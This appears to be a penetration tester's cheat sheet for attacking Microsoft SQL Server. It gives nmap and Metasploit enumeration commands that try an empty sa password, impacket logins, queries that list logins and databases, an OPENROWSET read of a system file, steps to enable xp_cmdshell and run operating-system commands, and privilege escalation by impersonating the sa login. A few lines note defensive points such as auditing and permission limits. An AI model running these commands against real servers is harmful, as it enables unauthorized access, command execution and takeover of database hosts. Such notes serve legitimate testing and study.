master - keeps the information for an instance of SQL Server.
msdb - used by SQL Server Agent.
model - a template database copied for each new database.
resource - a read-only database that holds the system objects which appear in every database on the server under the sys schema.
tempdb - keeps temporary objects for SQL queries.
xp_cmdshell:
xp_cmdshell is a powerful feature and is disabled by default. It can be enabled or disabled through Policy-Based Management or by executing sp_configure; because it is off by default, a change to this setting is a configuration event worth auditing.
The Windows process spawned by xp_cmdshell has the same security rights as the SQL Server service account, so the privileges of that account bound what any command run this way can do.
xp_cmdshell operates synchronously: control is not returned to the caller until the command-shell command has completed.
Weak or default sa credentials: admins may forget to disable this account.
# Enumerate via nmap
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <TARGET>
# Enumerate via MSF
use auxiliary/scanner/mssql/mssql_ping
set RHOSTS <TARGET>
run
### Login via Windows auth
impacket-mssqlclient -windows-auth <DOMAIN>/<USER>@<TARGET>
### Login via SQL auth
impacket-mssqlclient <USER>:<PASSWORD>@<TARGET>
SELECT @@version;
SELECT user_name();
SELECT system_user;
SELECT IS_SRVROLEMEMBER('sysadmin'); -- 1 means the current login is a member of sysadmin, 0 means it is not
# Users
SELECT name FROM master..syslogins;
# Databases
SELECT name FROM master..sysdatabases;
# Show tables
USE <DATABASE>;
SELECT name FROM sys.tables;
Read files
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents; -- OPENROWSET(BULK ...) requires the ADMINISTER BULK OPERATIONS permission (bulkadmin), so restricting that grant limits this read
Enable xp_cmdshell
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
xp_cmdshell '<COMMAND>';
# or run the command through a linked server
EXECUTE('xp_cmdshell ''<DOS_CMD>''') AT [<LINKED_SERVER>]
Impersonate user
-- Lists the logins for which an IMPERSONATE permission has been granted
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
GO
# Impersonating the sa user
USE master;
EXECUTE AS LOGIN = 'sa';
# Verify
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
# 0 is NOT admin